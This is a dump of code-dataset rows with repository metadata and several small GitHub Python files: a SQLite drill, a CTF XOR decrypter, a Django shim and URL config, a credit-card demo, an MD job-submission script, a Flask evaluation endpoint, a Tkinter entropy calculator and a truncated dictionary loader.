blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c9ecd35d616ef88ccc7f420415f08dd4ddf41e39 | f245ab2ecf1e0fbf8278e2a23b3835c8076d6afe | /Python/Databases & Python Drill - Py2.7/Drill2.py | 0f73bdfb2353faf20d2d8dcbe20824005f9c0a8f | [] | no_license | gordonmannen/The-Tech-Academy-Course-Work | 6bb6f799d9e0b8572b82c30fa3d2f928afc77bf5 | 685f336601064efa2f08ed6690ec876931d2e4b7 | refs/heads/master | 2021-01-17T13:23:24.588154 | 2016-07-31T04:42:24 | 2016-07-31T04:42:24 | 56,191,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | import sqlite3
# Python 2 drill script: collect a person's details interactively and store
# them in the `People` table of a local SQLite database.
# get person data from user and insert into a tuple
firstName=raw_input("Enter your first name:")
lastName=raw_input("Enter your last name:")
age=int(raw_input("Enter your age:"))
personData=(firstName,lastName,age)
# execute insert statement for supplied person data
# `with` commits the transaction on success and rolls back on exception.
with sqlite3.connect('test_database.db')as connection:
    c=connection.cursor()
    # Parameterized (?) placeholders — safe against SQL injection.
    c.execute("INSERT INTO People VALUES(?,?,?)",personData)
    # If you just wanted to update a particular detail for a person
    # c.execute("UPDATE People SET Age=?WHERE FirstName=? AND LastName?",
    # (45,'Luigi','Vercotti'))
    c.execute("UPDATE People SET Age=? WHERE FirstName=? AND LastName=?", (45,'Luigi','Vercotti'))
| [
"gordon.mannen@yahoo.com"
] | gordon.mannen@yahoo.com |
e4766238d4ec25a4e788d84ab3736928a41ee592 | 896ed66a7017baf5b5fa9bbfd5be874692199190 | /inctf/forensics/LOGarithm/dec.py | 6ac81eb1816ecc621597f64560884c170e15192c | [] | no_license | ayrustogaru/CTF-writeups | af552ecea69c2305f9bd409c5076c93b6665521c | 03748b8c7f923fc1f7b7552cc09390a4eedb04a7 | refs/heads/master | 2022-12-08T06:09:44.000084 | 2020-08-17T16:36:52 | 2020-08-17T16:36:52 | 286,497,790 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | #dec.py - A decrypter for the LOGarithm challenge
key = "UXpwY1VIbDBhRzl1TWpkY08wTTZYRkI1ZEdodmJqSTNYRk5qY21sd2RITTdRenBjVjJsdVpHOTNjMXh6ZVhOMFpXMHpNanRET2x4WAphVzVrYjNkek8wTTZYRmRwYm1SdmQzTmNVM2x6ZEdWdE16SmNWMkpsYlR0RE9seFhhVzVrYjNkelhGTjVjM1JsYlRNeVhGZHBibVJ2CmQzTlFiM2RsY2xOb1pXeHNYSFl4TGpCY08wTTZYRkJ5YjJkeVlXMGdSbWxzWlhNZ0tIZzROaWxjVG0xaGNDNURUMDA3TGtWWVJUc3UKUWtGVU95NURUVVE3TGxaQ1V6c3VWa0pGT3k1S1V6c3VTbE5GT3k1WFUwWTdMbGRUU0RzdVRWTkQK"
cipher = "PXgRVzcRMWkNZGIccglMH3QwUAR5XxgQdDh6PHJFaVJ6KkQCRAVqGHMfKyB8GEUQOlcRF0RTcj90MUR8RSUnE3gZOhIHM1A7bzFuCW0qSFN6IkgEKD9eKz0pEytBCHIpdFNYU3cKFRF4CSYTOg9uAkUFGBR0IHo/ciY3DnceWToCGXEBdANuZW1EWAV6N0QcATwfRTsEKCNtNFA4PBV8QzosXwdFEkgadjEzC3cZJgIDGEgSdBl2XW16Lwp3HzonAyJIGHoDJxBMJSJbJRlxKXQcZl1tX3I4PEtWPApYFixFF248cw0JTXo0GCo/RBgodDl6bXJaan48E2QYDT8KLG0LRCBCHB0DeR8AJzxEVDR6MTc2TzILCT5nUVgPZylkIXVyIW03YR10IFQ4dzlqMkNfdS51eVQkdjoZWG49cjx2HSBKejQIADJUdlJDUnYhQVVQaXR4Dkh9QiZXAFZ2J0IgFSR0QUtUdzJ1PDItSj4SJjEwdVZyFkQ3cjB0IDQy"
cipher = cipher.decode('base64')
# Decrypt by XOR-ing each ciphertext character with the repeating key,
# then print the recovered plaintext.
l = len(key)
msg = "".join(chr(ord(c) ^ ord(key[i % l])) for i, c in enumerate(cipher))
print(msg)
| [
"noreply@github.com"
] | ayrustogaru.noreply@github.com |
4e404b4c200a4b0a221a3538e8f15c212981517e | f00c8395790dca63dbbcc2fac4df39a00352c0bd | /venv/bin/django-admin.py | 52cf084b1072f56763ab153fcb77ecbcba289808 | [] | no_license | enasmohmed/Store | 2d524e2f45f758328603c476f62c1592b4154c8a | 66a8cecde29164bc0ef46b0ab95d77fd87a61fe3 | refs/heads/main | 2023-01-20T11:58:43.092800 | 2020-11-28T15:42:09 | 2020-11-28T15:42:09 | 310,835,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | #!/home/enas/Desktop/Django coretabs/venv/bin/python3
# Deprecation shim left behind by Django: `django-admin.py` was replaced by
# the `django-admin` entry point. This script warns (or refuses to run on
# Django 4.0+) and then delegates to the normal management command line.
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
    from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
    # On Django >= 4.0 the warning class is gone: fail loudly with guidance.
    raise ImportError(
        'django-admin.py was deprecated in Django 3.1 and removed in Django '
        '4.0. Please manually remove this script from your virtual environment '
        'and use django-admin instead.'
    )
if __name__ == "__main__":
    warnings.warn(
        'django-admin.py is deprecated in favor of django-admin.',
        RemovedInDjango40Warning,
    )
    # Delegate to the standard Django management CLI.
    management.execute_from_command_line()
| [
"enasm2477@gmail.com"
] | enasm2477@gmail.com |
81180b489da3bf91c69747e9b812d91a91911c9a | d131ace9edae9c6b2f6c69a3901609feffddafeb | /testing_credit_cards.py | a2f2e23b4d5eab244d000edc7de6c2d8060fa3d3 | [] | no_license | lateemaspencer/grokking-algorithm | 8acaf55c83de09f105f5fd047d812c4e5b57e4b2 | 3b654cafc2ef2bdb9be955f22d2de1939a8897d5 | refs/heads/master | 2021-01-12T00:52:08.080319 | 2017-01-19T22:28:51 | 2017-01-19T22:28:51 | 78,308,565 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 441 | py | from CreditCard import CreditCard
# Demo for the project-local CreditCard class: build a card, print its
# details, then pay the balance down in 100-unit instalments.
wallet = CreditCard('Lateema Spencer', 'California Savings', '5391 0375 9387 5309', 100)
print('Customer =', wallet.get_customer())
print('Bank =', wallet.get_bank())
print('Account =', wallet.get_account())
print('Limit =', wallet.get_limit())
print('Balance =', wallet.get_balance())
# Keep paying until the balance drops to the limit (100) or below.
# NOTE(review): loop body reconstructed — original indentation was lost;
# presumably all three statements belong to the loop. Verify against upstream.
while wallet.get_balance() > 100:
    wallet.make_payment(100)
    print('New Balance =', wallet.get_balance())
    print()
| [
"spencer.lateema@gmail.com"
] | spencer.lateema@gmail.com |
7995fc582146c2158eaa992be2a9ef6467415529 | f3b233e5053e28fa95c549017bd75a30456eb50c | /mcl1_input/L26/26-62_MD_NVT_rerun/set_1ns_equi_1.py | a035e758dac2d227d5ce00130a2c5ba6805a9fa2 | [] | no_license | AnguseZhang/Input_TI | ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | 50ada0833890be9e261c967d00948f998313cb60 | refs/heads/master | 2021-05-25T15:02:38.858785 | 2020-02-18T16:57:04 | 2020-02-18T16:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | import os
# Batch-submission script for thermodynamic-integration MD runs: for each
# lambda window it creates a fresh working directory, instantiates the
# input/PBS templates (replacing the XXX placeholder with the lambda value),
# copies topology/restart files, and submits the job with qsub.
dir = '/mnt/scratch/songlin3/run/mcl1/L26/MD_NVT_rerun/ti_one-step/26_62/'
filesdir = dir + 'files/'
temp_equiin = filesdir + 'temp_equi_1.in'
temp_pbs = filesdir + 'temp_1ns_equi_1.pbs'
# Lambda windows for the TI integration.
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
    # Recreate a clean per-window directory named after the lambda value.
    os.system("rm -r %6.5f" %(j))
    os.system("mkdir %6.5f" %(j))
    os.chdir("%6.5f" %(j))
    os.system("rm *")
    workdir = dir + "%6.5f" %(j) + '/'
    #equiin
    eqin = workdir + "%6.5f_equi_1.in" %(j)
    os.system("cp %s %s" %(temp_equiin, eqin))
    # Substitute the lambda placeholder in the equilibration input.
    os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, eqin))
    #PBS
    pbs = workdir + "%6.5f_1ns_equi_1.pbs" %(j)
    os.system("cp %s %s" %(temp_pbs, pbs))
    os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
    #top
    os.system("cp ../26-62_merged.prmtop .")
    os.system("cp ../0.5_equi_0.rst .")
    #submit pbs
    os.system("qsub %s" %(pbs))
    # Return to the parent directory before the next window.
    os.chdir(dir)
| [
"songlin3@msu.edu"
] | songlin3@msu.edu |
1dc650adae49d3a7f479a9ce4b8ad82b9fe7da99 | f6c9f71f8850d9db28f4de25307f5b9f2c81523c | /0x11-python-network_1/0-hbtn_status.py | 3e978c5b1848abb25b3358b61a15b1fe98adc277 | [] | no_license | RaudoR/holbertonschool-higher_level_programming | 382c527718f84920c9de8a527cbacb224a8886ca | 460750c7a8fa4e01609bd6964d993653a94a5805 | refs/heads/master | 2020-09-29T03:52:07.953201 | 2020-05-29T18:20:29 | 2020-05-29T18:20:29 | 226,943,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | #!/usr/bin/python3
'''script to fetch the url https://intranet.hbtn.io/status'''
import urllib.request
if __name__ == "__main__":
    # Fetch the status page and report the raw bytes plus a UTF-8 decode.
    with urllib.request.urlopen('https://intranet.hbtn.io/status') as response:
        html = response.read()
        print("Body response:")
        print("\t- type: {}".format(type(html)))
        print("\t- content: {}".format(html))
        print("\t- utf8 content: {}".format(html.decode("utf-8")))
| [
"rivaspaulino@outlook.com"
] | rivaspaulino@outlook.com |
50e9805b4c7342f69df26383d629e99793f89bc5 | f1d9917f6a26d71650fce36c9d5bb6cc27ba4571 | /setup.py | 22b5ac7ceacfe30e8796ea35a10812e78d5ab652 | [
"MIT"
] | permissive | arteria-project/arteria-bcl2fastq | 029caa20ba1deeb8f9f0a01429f6d416623245ae | afb1332c016d7af99cb710d3c6f4fe8f10775422 | refs/heads/master | 2023-07-12T21:14:48.265575 | 2023-07-03T08:48:58 | 2023-07-03T08:49:28 | 41,307,984 | 3 | 10 | MIT | 2023-05-05T11:37:55 | 2015-08-24T14:31:17 | Python | UTF-8 | Python | false | false | 779 | py | from setuptools import setup, find_packages
from bcl2fastq import __version__
import os
def read_file(fname):
    """Return the text contents of *fname*, resolved relative to this file.

    :param fname: file name (or absolute path) to read
    :return: the file's contents as a string

    Fix: the original opened the file without ever closing it; a context
    manager now guarantees the handle is released promptly.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as fp:
        return fp.read()
# Load pinned dependencies if requirements.txt is present; fall back to an
# empty list so the package can still be built from a bare checkout.
try:
    with open("requirements.txt", "r") as f:
        install_requires = [x.strip() for x in f.readlines()]
except IOError:
    install_requires = []
setup(
    name='bcl2fastq',
    version=__version__,
    description="Micro-service for running bcl2fastq",
    long_description=read_file('README.md'),
    keywords='bioinformatics',
    author='SNP&SEQ Technology Platform, Uppsala University',
    packages=find_packages(),
    include_package_data=True,
    entry_points={
        'console_scripts': ['bcl2fastq-ws = bcl2fastq.app:start']
    },
    # NOTE(review): install_requires is computed above but deliberately left
    # commented out here — dependencies are presumably installed separately.
    #install_requires=install_requires
)
| [
"johan.dahlberg@medsci.uu.se"
] | johan.dahlberg@medsci.uu.se |
7f0b48fdccfb0e7bc771b9a9250292bfdef7a407 | 3b796677e4fcd78d919bbe6608bfed0438db6515 | /Solved in Python/LeetCode/linkedlist/reverseLinkedList.py | 3750853e60649f27f43e657fc2f9878c4108cc24 | [] | no_license | soniaarora/Algorithms-Practice | 764ec553fa7ac58dd8c7828b9af3742bfdff3f85 | d58d88487ff525dc234d98a4d4e47f3d38da97a8 | refs/heads/master | 2020-08-25T05:37:19.715088 | 2019-10-23T04:57:56 | 2019-10-23T04:57:56 | 216,968,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | from sys import stdout
class Node:
    """A singly linked list cell: a value plus a pointer to the next cell."""

    def __init__(self, val):
        self.val = val
        self.next = None


class reverseLinkedList:
    """A minimal singly linked list supporting prepend, in-place reversal
    and printing."""

    def __init__(self):
        self.head = None

    def push(self, new_data):
        """Prepend a node carrying *new_data* to the front of the list."""
        node = Node(new_data)
        node.next, self.head = self.head, node

    def reverselinkedList(self):
        """Reverse the list in place by re-pointing every node at its
        predecessor."""
        reversed_head = None
        node = self.head
        while node is not None:
            # RHS is evaluated first, so this re-links and advances in one step.
            node.next, reversed_head, node = reversed_head, node, node.next
        self.head = reversed_head

    def printList(self):
        """Print every value front-to-back with no separator or newline."""
        node = self.head
        while node is not None:
            print(node.val, end="")
            node = node.next
# Demo: build the list 10 -> 12 -> 14 -> 20 (push prepends), print it,
# reverse it in place, and print it again.
listt = reverseLinkedList()
listt.push(20)
listt.push(14)
listt.push(12)
listt.push(10)
listt.printList()
print("reverse list")
listt.reverselinkedList()
listt.printList()
| [
"soniaarora141@gmail.com"
] | soniaarora141@gmail.com |
7cd6dead451db1b118d909eb26b0f50214f90344 | 2cc0972b0e99d8861bb6a84400c7e2c57f9f6cfe | /src/service.py | d8cc0ed7ed27f0fa29071829d996e6c0e46106fd | [] | no_license | activesphere/progeval | 853482ef7294da1c54f58bb4afc02354cabbd5bd | 0fd3d711a790f8983d7db1d1bdc83a4a5f4d17df | refs/heads/master | 2021-01-11T17:36:09.123958 | 2017-01-30T11:15:59 | 2017-01-30T11:15:59 | 79,797,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,349 | py | from flask import Flask, request, Response
from flask_cors import CORS, cross_origin
from modules import rct
import random, json
# App Config
app = Flask(__name__)
CORS(app)
# Config Variables
# Upper bound on submitted code length; requests above this are rejected.
app.config['MAX_CODE_LINES'] = 1000
# Response Wrappers — small helpers that build plain Flask Response objects
# with the right status code and content type.
def _success_ok(data):
    # 200 with a pre-serialized JSON payload.
    return Response(response=data, status=200, content_type='application/json')
def _success_accepted(message='Accepted'):
    # 202: request accepted for asynchronous processing.
    return Response(response=message, status=202, content_type='text/plain')
def _error_badrequest(message='Bad Request'):
    # 400: malformed or incomplete client input.
    return Response(response=message, status=400, content_type='text/plain')
def _error_internalerr(message='Internal Server Error'):
    # 500: unexpected server-side failure.
    return Response(response=message, status=500, content_type='text/plain')
# Routes
@app.route('/evaluate', methods=['POST'])
def evaluate():
    """Evaluate a submitted program and return the result as JSON.

    Expects a JSON body with keys 'code' (list of source lines), 'lang'
    and 'problem_id'. Responds 400 for missing/malformed JSON, missing
    keys, or submissions longer than MAX_CODE_LINES.
    """
    req_data = request.get_json(silent=True)
    # Fix: get_json(silent=True) returns None when the body is absent or not
    # valid JSON; without this guard the .pop() below raised AttributeError
    # and the client saw a 500 instead of a 400.
    if not isinstance(req_data, dict):
        return _error_badrequest()
    try:
        code_array = req_data.pop('code')
        lang = req_data.pop('lang')
        problem_id = req_data.pop('problem_id')
    except KeyError:
        return _error_badrequest()
    if len(code_array) > app.config.get('MAX_CODE_LINES'):
        return _error_badrequest()
    # A random numeric id is enough to namespace one evaluation run.
    program_id = str(int(random.random() * 10000000))
    lang = lang.upper()
    result = rct.run_at_scale(program_id, lang, code_array, problem_id)
    return _success_ok(json.dumps({'result': result}))
| [
"omkar@activesphere.com"
] | omkar@activesphere.com |
e75057981a3bdeac7738d8a54a38c61bba6cfdeb | f4ed463c93dfc37875a12295bce3f3753aa667a6 | /btre/urls.py | a39da920c32c434b653b74762258313d515622d1 | [] | no_license | mcbyrnewpi/realtor-project | 675c59f50eae9bde654cf9fa23b7081e9504c71c | 420dc079173f8c4261e02e25c38ee85a02169852 | refs/heads/master | 2020-04-17T05:07:36.764569 | 2019-01-17T21:32:46 | 2019-01-17T21:32:46 | 166,264,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django.contrib import admin
from django.urls import path, include
# URL routing table: the site root is delegated to the `pages` app; the
# Django admin is exposed under /admin/.
urlpatterns = [
    path('', include('pages.urls')),
    path('admin/', admin.site.urls),
]
| [
"mcbyrnewpi@yahoo.com"
] | mcbyrnewpi@yahoo.com |
310ba3efc4b50e2afd0630a3084758e3d9fb7876 | a73e85150f1bcf6caacb1ad0fde0abb4717faaf5 | /calc.py | 7a741d61a97a6e57a6e143659d055a17ee57d024 | [] | no_license | Stephan-Neo/Otnos-izb | 1898f524f2c43b7a177e742b11b578ea8f35e077 | c59dba063dd82e0864dc1e223a5479ca0173bca5 | refs/heads/main | 2023-09-01T14:27:02.417845 | 2021-10-14T08:16:17 | 2021-10-14T08:16:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,608 | py | # В программе есть проверка на ввод текста(выводит диологовое окно, если ничего не ввести), проверка на выбор языка
# (it shows a dialog box if no language is selected, or a different one is chosen)
# Author: Stepan Kazantsev, SMB-101
from tkinter import *
from tkinter import filedialog as fd
from tkinter import messagebox
from math import log2
from webbrowser import open as op
from time import sleep
# --- main window configuration ---
window: Tk = Tk()
window.geometry(f"1000x600+100+200")
window.resizable(width=False, height=False)
window.title("Калькулятор относительной избыточности")
window.iconbitmap("source/prev.ico")
window.config(bg="white")
# Radio-button state: 0 = nothing selected, 1 = Russian, 2 = English.
rb_var = IntVar()
rb_var.set(0)
# --- module-level state shared by the handlers below ---
message = ''
language = ''
# Pre-loaded images: formula panels (img_1..img_4), logo button, and a
# white overlay used to clear the left pane between runs.
image_1 = PhotoImage(file="source/img_1.png")
image_2 = PhotoImage(file="source/img_2.png")
image_3 = PhotoImage(file="source/img_3.png")
image_4 = PhotoImage(file="source/img_4.png")
gt = PhotoImage(file="source/big_logo.png")
image_clear = PhotoImage(file="source/clear.png")
# Calculation state, (re)filled on every "Рассчитать" click.
count_start_calculate = 0
alphabet_power = 0
probability_symbol = {}
entropy = 0
max_entropy = 0
relative_redundancy = 0
len_message = 0
def insertText():
    """Let the user pick a file and load its contents into the text widget.

    Fixes: the file dialog returns an empty string when cancelled (the
    original then crashed on open('')), and the file handle is now closed
    via a context manager even if reading fails.
    """
    file_name = fd.askopenfilename()
    if not file_name:
        # Dialog was cancelled — leave the current text untouched.
        return
    with open(file_name) as f:
        string = f.read()
    inputtxt.delete("1.0", "end")
    inputtxt.insert(1.0, string)
# check function
def check_language():
    """Configure the selected language from the radio-button state.

    Sets the module-level ``language`` label, ``alphabet_power`` (alphabet
    size) and ``probability_symbol`` (a fresh per-letter counter dict,
    every letter mapped to 0). Selection 1 = Russian, 2 = English;
    anything else leaves the globals unchanged.
    """
    global language, alphabet_power, probability_symbol
    selection = rb_var.get()
    if selection == 2:
        language = "ENGLISH"
        alphabet_power = 26
        letters = "abcdefghijklmnopqrstuvwxyz"
        probability_symbol = {letter: 0 for letter in letters}
    elif selection == 1:
        language = "RUSSIA"
        alphabet_power = 33
        letters = "абвгдеёжзийклмнопрстуфхцчшщъыьэюя"
        probability_symbol = {letter: 0 for letter in letters}
def check_warning():
    """Validate user input before calculating.

    Shows an error dialog ("Ошибка" = "Error") when no text was entered
    ("Вы не ввели текст!") or no language was selected ("Вы не выбрали
    язык!"). Returns True when input is valid, otherwise returns None.
    """
    # First character empty/space is treated as "no text entered".
    if inputtxt.get(1.0, 1.1) == '' or inputtxt.get(1.0, 1.1) == ' ':
        messagebox.showerror('Ошибка', 'Вы не ввели текст!')
    elif language == '':
        messagebox.showerror('Ошибка', 'Вы не выбрали язык!')
    else:
        return True
# draw function
def draw_radiobutton():
    """Place the two language radio buttons (Russian = 1, English = 2)
    bound to the shared rb_var."""
    Radiobutton(text="Русский", variable=rb_var, activebackground="purple", value=1,
                font=("Helvetica", 9, "bold"), relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2").place(
        x=760, y=480)
    Radiobutton(text="Английский", variable=rb_var, activebackground="purple", value=2, font=("Helvetica", 9, "bold"),
                relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2").place(x=850, y=480)
def draw_window_right():
    """Build the right-hand input pane: header label, the text entry box
    (exposed as the module-global ``inputtxt``), a file-open button, the
    language radio buttons and the "Рассчитать" (Calculate) button."""
    global inputtxt
    Label(window, text="Введите текст", font=("Helvetica", 20, "bold"), bg="white").place(x=650, y=10)
    inputtxt = Text(window, height=15, width=40, bg="light cyan", pady=5, padx=5, bd=5, font=("Helvetica", 14), spacing2=5, spacing1=5, selectbackground="purple")
    inputtxt.place(x=510, y=50)
    # "Выбрать" = "Choose": open a file picker and load its contents.
    b_open = Button(text="Выбрать", activebackground="purple", command=insertText, font=("Helvetica", 9, "bold"), relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2")
    b_open.place(x=510, y=480)
    draw_radiobutton()
    b_start = Button(text="Рассчитать", width=37, command=start_calculate, activebackground="purple", font=("Helvetica", 14, "bold"), relief="groove", bg="cyan", fg="black", bd=5, cursor="hand2")
    b_start.place(x=510, y=525)
def draw_window_left():
    """Animate the left-hand result pane: reveal the formula images one by
    one (0.5 s apart) with the computed entropy, maximum entropy and
    relative redundancy values, then show the clickable logo."""
    time_sleep = 0.5
    # window.update() forces a redraw before each sleep so the reveal is visible.
    window.update()
    sleep(time_sleep)
    img_1 = Label(window, image=image_1, bg="white")
    img_1.place(x=0, y=45)
    window.update()
    sleep(time_sleep)
    img_2 = Label(window, image=image_2, bg="white")
    img_2.place(x=5, y=165)
    Label(window, text=round(entropy, 2), fg='cyan', font=("Helvetica", 18, "bold"), bg="white").place(x=350, y=180)
    window.update()
    sleep(time_sleep)
    img_3 = Label(window, image=image_3, bg="white")
    img_3.place(x=8, y=300)
    Label(window, text=round(max_entropy, 2), fg='cyan', font=("Helvetica", 18, "bold"), bg="white").place(x=350, y=305)
    window.update()
    sleep(time_sleep)
    img_4 = Label(window, image=image_4, bg="white")
    img_4.place(x=8, y=420)
    Label(window, text=round(relative_redundancy, 10), fg='cyan', font=("Helvetica", 18, "bold"), bg="white").place(x=280, y=423)
    window.update()
    sleep(time_sleep)
    # Logo doubles as a link button to the author's site.
    link = Button(activebackground="white", command=open_site_gtsk, image=gt, font=("Helvetica", 14, "bold"), relief="raised", bg="white", fg="black", bd=0, cursor="hand2")
    link.place(x=10, y=550)
def open_site_gtsk():
    """Open https://gtsk.pw in the default browser (op = webbrowser.open)."""
    op('https://gtsk.pw', new=0, autoraise=True)
# calculate function
def start_calculate():
    """Handler for the "Рассчитать" (Calculate) button.

    Reads and lower-cases the entered text, configures the language, clears
    the previous results (from the second run on), validates the input, and
    runs the full pipeline: count -> probabilities -> entropy -> relative
    redundancy -> draw results. A ZeroDivisionError from the pipeline means
    no character of the chosen alphabet occurred in the text, i.e. the
    wrong language was selected ("Вы выбрали не тот язык!").
    """
    global message, count_start_calculate
    count_start_calculate += 1
    message = inputtxt.get(1.0, 'end').lower()
    check_language()
    if count_start_calculate > 1:
        # Paint the white overlay over the left pane to erase prior results.
        Label(window, image=image_clear, bg="white").place(x=0, y=0)
    if check_warning():
        try:
            count_element()
            calculate_probability()
            calculate_entropy()
            calculate_relative_redundancy()
            if entropy != 0:
                draw_window_left()
        except ZeroDivisionError:
            messagebox.showerror('Ошибка', 'Вы выбрали не тот язык!')
def count_element():
    """Recompute the module-level ``len_message``: how many characters of
    the selected alphabet occur in the current ``message``."""
    global len_message
    len_message = sum(message.count(symbol) for symbol in probability_symbol)
def calculate_probability():
    """Replace each counter in ``probability_symbol`` with the letter's
    relative frequency in ``message`` (count / alphabet-character total)."""
    global probability_symbol
    probability_symbol = {
        symbol: message.count(symbol) / len_message
        for symbol in probability_symbol
    }
def calculate_entropy():
    """Compute Shannon entropy of the letter distribution and the maximum
    entropy of the message.

    entropy = sum(p * log2(1/p)) over letters with nonzero probability
    (bits per symbol). max_entropy multiplies log2(alphabet size) by the
    message length.

    NOTE(review): entropy is per-symbol while max_entropy scales with the
    whole message — presumably intentional for this assignment's relative
    redundancy formula; verify against the course definition.
    """
    global entropy, max_entropy
    entropy = 0
    max_entropy = 0
    for i in probability_symbol:
        if probability_symbol[i] != 0:
            entropy += probability_symbol[i]*log2(1 / probability_symbol[i])
    max_entropy = len_message*log2(alphabet_power)
def calculate_relative_redundancy():
    """Relative redundancy D = (Hmax - H) / Hmax from the previously
    computed entropy values. Raises ZeroDivisionError when max_entropy is 0
    (empty/foreign-alphabet text), which start_calculate() catches."""
    global relative_redundancy, max_entropy, entropy
    relative_redundancy = (max_entropy - entropy) / max_entropy
def main():
    """Build the input pane; results are drawn after the user clicks
    "Рассчитать"."""
    draw_window_right()
# Build the UI, then hand control to the Tk event loop.
main()
window.mainloop()
| [
"noreply@github.com"
] | Stephan-Neo.noreply@github.com |
fee3d63104b3a5f16534c2d6178df494e2afea73 | 935b332d3e17033a5101af12b21872ca3de5aa75 | /ieml/dictionary/dictionary.py | d9d489b3b9b6ab332a200acc54e74ae52ce7b92d | [] | no_license | IEMLdev/ieml-dictionary | 7e7dedfa318022c392a3b75a5b713cbf21bb9df0 | 1622d98d283c322639602c38ac22dbf647ecdce6 | refs/heads/master | 2020-04-07T06:29:27.658416 | 2019-01-25T16:05:59 | 2019-01-25T16:05:59 | 158,137,631 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,887 | py | import hashlib
from typing import List, Dict
import dill
import sys
from ieml.constants import LANGUAGES, DICTIONARY_FOLDER
from ieml.dictionary.relation.relations import RelationsGraph
from ieml.dictionary.script import script
import numpy as np
from collections import namedtuple
import os
import yaml
from ieml.dictionary.table.table_structure import TableStructure
# Per-language value containers keyed by the configured LANGUAGES.
Translations = namedtuple('Translations', sorted(LANGUAGES))
# Allow lookup by language name (t['fr']) in addition to tuple indexing.
Translations.__getitem__ = lambda self, item: self.__getattribute__(item) if item in LANGUAGES \
    else tuple.__getitem__(self, item)
Comments = namedtuple('Comments', sorted(LANGUAGES))
# Same language-name lookup behaviour as Translations.
Comments.__getitem__ = lambda self, item: self.__getattribute__(item) if item in LANGUAGES \
    else tuple.__getitem__(self, item)
class FolderWatcherCache:
    """Pickle cache keyed on a folder's contents.

    The cache file name embeds an MD5 digest of every file in the watched
    folder, so any change to the folder automatically invalidates
    ("prunes") the cache.
    """

    def __init__(self, folder: str, cache_folder: str):
        """
        Cache that check if `folder` content has changed. Compute a hash of the files in the folder and
        get pruned if the content of this folder change.

        :param folder: the folder to watch
        :param cache_folder: the folder to put the cache file
        """
        self.folder = folder
        self.cache_folder = os.path.abspath(cache_folder)

    def update(self, obj) -> None:
        """
        Update the cache content, remove old cache files from the cache directory.
        :param obj: the object to pickle in the cache
        :return: None
        """
        # Remove every candidate first: their digests no longer match.
        for c in self._cache_candidates():
            os.remove(c)
        with open(self.cache_file, 'wb') as fp:
            dill.dump(obj, fp)

    def get(self) -> object:
        """
        Unpickle and return the object stored in the cache file.
        :return: the stored object
        """
        with open(self.cache_file, 'rb') as fp:
            return dill.load(fp)

    def is_pruned(self) -> bool:
        """
        Return True if the watched folder content has changed.
        :return: if the folder content changed
        """
        names = [p for p in self._cache_candidates()]
        if len(names) != 1:
            return True
        # Exactly one candidate whose digest matches the current folder
        # state means the cache is still fresh.
        return self.cache_file != names[0]

    @property
    def cache_file(self) -> str:
        """
        :return: The cache file absolute path
        """
        # Digest "<name>:<bytes>" for every file in sorted order, so both
        # renames and content edits change the resulting path.
        res = b""
        for file in sorted(os.listdir(self.folder)):
            with open(os.path.join(self.folder, file), 'rb') as fp:
                res += file.encode('utf8') + b":" + fp.read()
        return os.path.join(self.cache_folder, ".dictionary-cache.{}".format(hashlib.md5(res).hexdigest()))

    def _cache_candidates(self) -> List[str]:
        """
        Return all the cache files from the cache folder (the pruned and the current one)
        :return: All the cache files from the cache folder
        """
        return [os.path.join(self.cache_folder, n) for n in os.listdir(self.cache_folder) if n.startswith('.dictionary-cache.')]
def get_dictionary_files(folder:str=DICTIONARY_FOLDER):
    """Return the sorted paths of every *.yaml paradigm file in *folder*."""
    yaml_files = []
    for entry in os.listdir(folder):
        if entry.endswith('.yaml'):
            yaml_files.append(os.path.join(folder, entry))
    yaml_files.sort()
    return yaml_files
class Dictionary:
    """The IEML dictionary: all scripts (semes, paradigms, root paradigms)
    with their translations/comments, table structure and relation graph."""

    @classmethod
    def load(cls, folder:str=DICTIONARY_FOLDER, use_cache:bool=True, cache_folder:str=os.path.abspath('.')):
        """
        Load a dictionary from a dictionary folder. The folder must contains a list of paradigms

        :param folder: The folder
        :param use_cache: reuse a FolderWatcherCache keyed on the folder contents
        :param cache_folder: where the cache file lives
        :return: the loaded Dictionary
        """
        print("Dictionary.load: Reading dictionary at {}".format(folder), file=sys.stderr)

        if use_cache:
            cache = FolderWatcherCache(folder, cache_folder=cache_folder)
